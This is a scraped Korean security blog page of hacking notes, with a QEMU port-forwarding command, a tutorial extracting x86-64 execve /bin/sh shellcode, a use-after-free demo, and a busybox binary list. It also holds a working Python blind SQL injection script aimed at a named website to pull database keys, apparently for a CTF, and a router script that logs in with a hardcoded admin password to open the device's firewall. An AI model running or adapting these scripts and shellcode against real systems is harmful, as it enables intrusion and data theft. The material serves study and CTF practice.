2016. 2. 21. 22:09

QEMU 돌릴때 포트포워딩 옵션

System_Hacking

자꾸 놓치게 되어서 메모함.


네트워크 qemu 다운받는곳

 

https://people.debian.org/~aurel32/qemu/


관련파일 설치 하고 -> 관련 파일다운받아 아래와같이 리다이렉팅 




 #qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta_kernel.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -redir tcp:2222::22 -redir tcp:8080::80 --nographic


이후 scp 로 파일전송하면 파일 이동도가능 



저작자표시 비영리 변경금지

'System_Hacking' 카테고리의 다른 글

[검색용][python] Remote exploit 할때 기본 포멧  (0) 2016.05.06
SPI 통신으로 firmware dump 뜨기  (0) 2016.02.21
Shellcode 뽑아내는 깨알 팁.  (0) 2015.12.21
call, leave, ret assembly  (0) 2015.09.11
Android stageFright RCE exploit  (0) 2015.09.10
Posted by k1rha
2015. 12. 21. 15:12

Shellcode 뽑아내는 깨알 팁.

System_Hacking

멍청하게 손으로 쉘코드를 일일이 치지말자 


Some assembly required

We begin our journey by writing assembly to launch a shell via the execve system call.

For backwards compatibility, 32-bit Linux system calls are supported in 64-bit Linux, so we might think we can reuse shellcode targeted for 32-bit systems. However, the execve syscall takes a memory address holding the NUL-terminated name of the program that should be executed. Our shellcode might be injected someplace that requires us to refer to memory addresses larger than 32 bits. Thus we must use 64-bit system calls.

The following may aid those accustomed to 32-bit assembly.

32-bit syscall64-bit syscall

instruction

int $0x80

syscall

syscall number

EAX, e.g. execve = 0xb

RAX, e.g. execve = 0x3b

up to 6 inputs

EBX, ECX, EDX, ESI, EDI, EBP

RDI, RSI, RDX, R10, R8, R9

over 6 inputs

in RAM; EBX points to them

forbidden

example

mov $0xb, %eax
lea string_addr, %ebx
mov $0, %ecx
mov $0, %edx
int $0x80
mov $0x3b, %rax
lea string_addr, %rdi
mov $0, %rsi
mov $0, %rdx
syscall

We inline our assembly code in a C file, which we call shell.c:

int main() {
  asm("\
needle0: jmp there\n\
here:    pop %rdi\n\
         xor %rax, %rax\n\
         movb $0x3b, %al\n\
         xor %rsi, %rsi\n\
         xor %rdx, %rdx\n\
         syscall\n\
there:   call here\n\
.string \"/bin/sh\"\n\
needle1: .octa 0xdeadbeef\n\
  ");
}

No matter where in memory our code winds up, the call-pop trick will load the RDI register with the address of the "/bin/sh" string.

The needle0 and needle1 labels are to aid searches later on; so is the0xdeadbeef constant (though since x86 is little-endian, it will show up as EF BE AD DE followed by 4 zero bytes).

For simplicity, we’re using the API incorrectly; the second and third arguments to execve are supposed to point to NULL-terminated arrays of pointers to strings (argv[] and envp[]). However, our system is forgiving: running "/bin/sh" with NULL argv and envp succeeds:

ubuntu:~$ gcc shell.c
ubuntu:~$ ./a.out
$

In any case, adding argv and envp arrays is straightforward.

The shell game

We extract the payload we wish to inject. Let’s examine the machine code:

$ objdump -d a.out | sed -n '/needle0/,/needle1/p'
00000000004004bf <needle0>:
  4004bf:       eb 0e                   jmp    4004cf <there>

00000000004004c1 <here>:
  4004c1:       5f                      pop    %rdi
  4004c2:       48 31 c0                xor    %rax,%rax
  4004c5:       b0 3b                   mov    $0x3b,%al
  4004c7:       48 31 f6                xor    %rsi,%rsi
  4004ca:       48 31 d2                xor    %rdx,%rdx
  4004cd:       0f 05                   syscall

00000000004004cf <there>:
  4004cf:       e8 ed ff ff ff          callq  4004c1 <here>
  4004d4:       2f                      (bad)
  4004d5:       62                      (bad)
  4004d6:       69 6e 2f 73 68 00 ef    imul   $0xef006873,0x2f(%rsi),%ebp

00000000004004dc <needle1>:

On 64-bit systems, the code segment is usually placed at 0x400000, so in the binary, our code lies starts at offset 0x4bf and finishes right before offset 0x4dc. This is 29 bytes:

$ echo $((0x4dc-0x4bf))
29

We round this up to the next multiple of 8 to get 32, then run:

$ xxd -s0x4bf -l32 -p a.out shellcode

Let’s take a look:

$ cat shellcode
eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef
bead


저작자표시 비영리 변경금지

'System_Hacking' 카테고리의 다른 글

SPI 통신으로 firmware dump 뜨기  (0) 2016.02.21
QEMU 돌릴때 포트포워딩 옵션  (0) 2016.02.21
call, leave, ret assembly  (0) 2015.09.11
Android stageFright RCE exploit  (0) 2015.09.10
ARM32 netcat static compile  (0) 2015.09.02
Posted by k1rha
2015. 10. 24. 16:20

[ python ] whitehat 웹해킹 문제 블라인드 인젝션 exploit 코드

Web_Hacking

#!/usr/bin/python


import urllib2,urllib,time

# select database()

#query = "1 and (substr((lpad(bin(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),7,0)),1,1)=1)"

#5F5F5F5F5F5F5F5F5F5F5F5F313339313533363335

target = "select group_concat(keystr) from KeyDB.kt1509 where signature like 0x3234306136346465633530615F5F5F5F5F5F5F5F"

x = 0

answer = ""


while 1:

x +=1

ch = 0


for i in range(1,8):

url = "http://poworks.com/index.php/forum/?cid=0&show="

#att = "1 and ascii(substr((%s),%d,1))=%d"%(target,x,i)

att = "1 and (substr((select lpad( bin( ascii(substr((%s),%d,1)) ),7,0)) ,%d,1)=1)#"%(target,x,i)

att = urllib.quote(att)

url += att

req = urllib2.Request(url)

result = urllib2.urlopen(req).read()

#print result

r = result.find("No replies posted yet.")

if r > -1:

ch += 2**(7-i)

else:

pass


if ch == 0:


break


else:


answer += chr(ch)


print ":) : "+ answer



print "END : ",answer



저작자표시 비영리 변경금지

'Web_Hacking' 카테고리의 다른 글

SQLMAP sql injectionor  (0) 2015.03.03
php mail function php injection  (0) 2014.11.08
파일내에 exec 계열 함수 사용 여부 (내용으로검색)  (0) 2013.10.05
[white hacking] 화이트 해킹대회 web PPPPAAAASSSWWW... (150Point)  (0) 2013.09.15
[White Hacking] Serial2 web(150 point) Write-up  (0) 2013.09.15
Posted by k1rha
2015. 9. 15. 14:03

busybox ( arm mips ) static prebuild binary

카테고리 없음

busybox static prebuild binary


http://www.busybox.net/downloads/binaries/1.16.1/



[   ] busybox-armv4eb                                    29-Mar-2010 20:49  1.0M  
[   ] busybox-armv4l                                     29-Mar-2010 20:49  1.0M  
[   ] busybox-armv4tl                                    29-Mar-2010 20:50  1.1M  
[   ] busybox-armv5l                                     29-Mar-2010 20:50  1.1M  
[   ] busybox-armv6l                                     29-Mar-2010 20:50  1.1M  
[   ] busybox-i486                                       29-Mar-2010 20:50  878K  
[   ] busybox-i586                                       29-Mar-2010 20:50  878K  
[   ] busybox-i686                                       29-Mar-2010 20:50  878K  
[   ] busybox-mips                                       29-Mar-2010 20:50  1.6M  
[   ] busybox-mips64                                     29-Mar-2010 20:51  1.5M  
[   ] busybox-mipsel                                     29-Mar-2010 20:51  1.6M  
[   ] busybox-powerpc                                    29-Mar-2010 20:51  1.1M  
[   ] busybox-powerpc-440fp                              29-Mar-2010 20:49  1.1M  
[   ] busybox-sh4                                        29-Mar-2010 20:51  958K  
[   ] busybox-sparc                                      29-Mar-2010 20:51  1.1M  
[   ] busybox-x86_64                                     29-Mar-2010 20:51  950K  
[   ] config-busybox                                     29-Mar-2010 20:55   21K


저작자표시 비영리 변경금지
Posted by k1rha
2015. 9. 11. 19:21

call, leave, ret assembly

System_Hacking

call =  push eip + 1frame address 

        jmp [address]  


leave =  mov esp,ebp

          pop ebp    

ret =  mov eip, [esp]  

       pop esp

저작자표시 비영리 변경금지

'System_Hacking' 카테고리의 다른 글

QEMU 돌릴때 포트포워딩 옵션  (0) 2016.02.21
Shellcode 뽑아내는 깨알 팁.  (0) 2015.12.21
Android stageFright RCE exploit  (0) 2015.09.10
ARM32 netcat static compile  (0) 2015.09.02
UAF (use after free) 예제코드  (0) 2015.08.19
Posted by k1rha
2015. 9. 10. 19:13

Android stageFright RCE exploit

System_Hacking



http://0day.today/exploit/24222


 쓸만한것들이 좀있음. 일단 저장용 


저작자표시 비영리 변경금지

'System_Hacking' 카테고리의 다른 글

Shellcode 뽑아내는 깨알 팁.  (0) 2015.12.21
call, leave, ret assembly  (0) 2015.09.11
ARM32 netcat static compile  (0) 2015.09.02
UAF (use after free) 예제코드  (0) 2015.08.19
ARM 32bit assambly 설명 잘된 링크  (0) 2015.05.17
Posted by k1rha
2015. 9. 2. 16:43

ARM32 netcat static compile

System_Hacking

ARM32 netcat static compile 


nc_arm32_static


저작자표시 비영리 변경금지

'System_Hacking' 카테고리의 다른 글

call, leave, ret assembly  (0) 2015.09.11
Android stageFright RCE exploit  (0) 2015.09.10
UAF (use after free) 예제코드  (0) 2015.08.19
ARM 32bit assambly 설명 잘된 링크  (0) 2015.05.17
64bit 포멧스트링 널바이트 만들어주기  (0) 2015.04.24
Posted by k1rha
2015. 8. 19. 10:13

UAF (use after free) 예제코드

System_Hacking

세미나용으로 만든 UAF 예제코드 



#include <iostream>

#include <stdlib.h>

#include <string.h>

#include <stdio.h>


using namespace std;

class B

{

public:

char *v1 = NULL;

virtual void foo(int a)

{

cout << "B Foo Call" << a << endl;

}

};


class D : public B

{

public:

char *buff;

void foo(int a)

{

cout << "D Foo Call " << a << endl;

}

};


class E

{

public:

char buff[24]="";

void test(int a){

cout << "E->TEST "<<endl;

}

void copy(char *v2){

memcpy(buff,v2,20);

}


};

int foo3(){

cout << "This is UNUSING FOO " <<endl;

return 0;

}

int (*funcAddr)() = foo3;

int main(int argc, char *argv[]){


char * test;

B *d,*b;

E *e;


printf("-------------------------------\n");

printf("[PRINT] UNUSING FOO function addr %x \n",&funcAddr);

printf("-------------------------------\n");

d = new D;

delete d;


e = new E;

e->copy(argv[1]);


printf("d->foo(9) call \n");

d->foo(9);





return 0;

}



저작자표시 비영리 변경금지

'System_Hacking' 카테고리의 다른 글

Android stageFright RCE exploit  (0) 2015.09.10
ARM32 netcat static compile  (0) 2015.09.02
ARM 32bit assambly 설명 잘된 링크  (0) 2015.05.17
64bit 포멧스트링 널바이트 만들어주기  (0) 2015.04.24
gef peda 의 다양한 아키텍쳐 버젼  (0) 2015.04.01
Posted by k1rha
2015. 7. 28. 20:10

SSL 통신 암호화 과정

Neywork

SSL 통신 암호화 과정


저작자표시 비영리 변경금지

'Neywork' 카테고리의 다른 글

reverse connection cheat sheet  (0) 2015.04.17
BEIST 님이 작성하셨던 특정 proccess packet capture 만들기  (0) 2014.10.07
Network vender Model default password  (0) 2014.01.02
윈도우8 애드훅(애드혹, AdHoc) 설정하기  (0) 2013.09.11
IPTIME 해킹 관련 내용 1  (0) 2012.07.17
Posted by k1rha
2015. 7. 12. 13:33

httplib urllib2 를 이용해서 cookie (session) 값 유지한채로 통신하기

Python

웹세션 유지한채로 통신하기



import httplib

import urllib

import urllib2

import os 

import time

import getpass

import sys

import telnetlib


RouterIP = "192.168.123.1"



def HttpAdminLogin():

#print ":::     CONNECT ADMIN SESSION     "

loginURL2 = "http://"+RouterIP+"/ap_login.asp"

params2 = {"page":"ap_login.asp","http_passwd":"YWRtaW4=",'hidden_action':"Login"}

params2 = urllib.urlencode(params2)

try :

conn = urllib2.Request(loginURL2,params2)

conn.add_header("Content-Type","application/x-www-form-urlencoded")

response = urllib2.urlopen(conn)

cookie = response.headers.get('Set-Cookie')  ## 여기서 쿠키값을 가져옴

except :

print "CONNECTION ERROR "

return


time.sleep(1)

## iptables OPEN

print ":::     IPTABLES FIREWALL IS OPENED      "

loginURL = "http://"+RouterIP+"/test.asp"

params ={"page":"ap_login.asp","http_passwd":"YWRtaW4=",'hidden_action':"Login"}

params = urllib.urlencode(params)

try :

conn = urllib2.Request(loginURL,params)

conn.add_header("Content-Type","application/x-www-form-urlencoded")

conn.add_header("cookie",cookie)  ## 여기서 쿠기값을 저장 

response = urllib2.urlopen(conn)

except :

print "IPTABLES FIREWALL OPEN FAIL"

return 


def main():

try :

RouterIP = sys.argv[1]

except :

RouterIP = "192.168.123.1"


print ":::     Home Router IP -> " + str(RouterIP)

HttpAdminLogin()

if __name__ == "__main__":

main()



저작자표시 비영리 변경금지

'Python' 카테고리의 다른 글

펌웨어 전체 파일에서 하드코딩된 스트링 찾을때..  (0) 2016.10.09
dbus tree  (0) 2016.04.27
python iterator 관련itertools 패키지 및 메소드 정리  (0) 2014.06.01
python string 관련 메소드 정리  (0) 2014.06.01
[ Python 2.7 ] 키보드 마우스 후킹 ( Key Mouse Event hooking )  (0) 2014.05.24
Posted by k1rha

티스토리툴바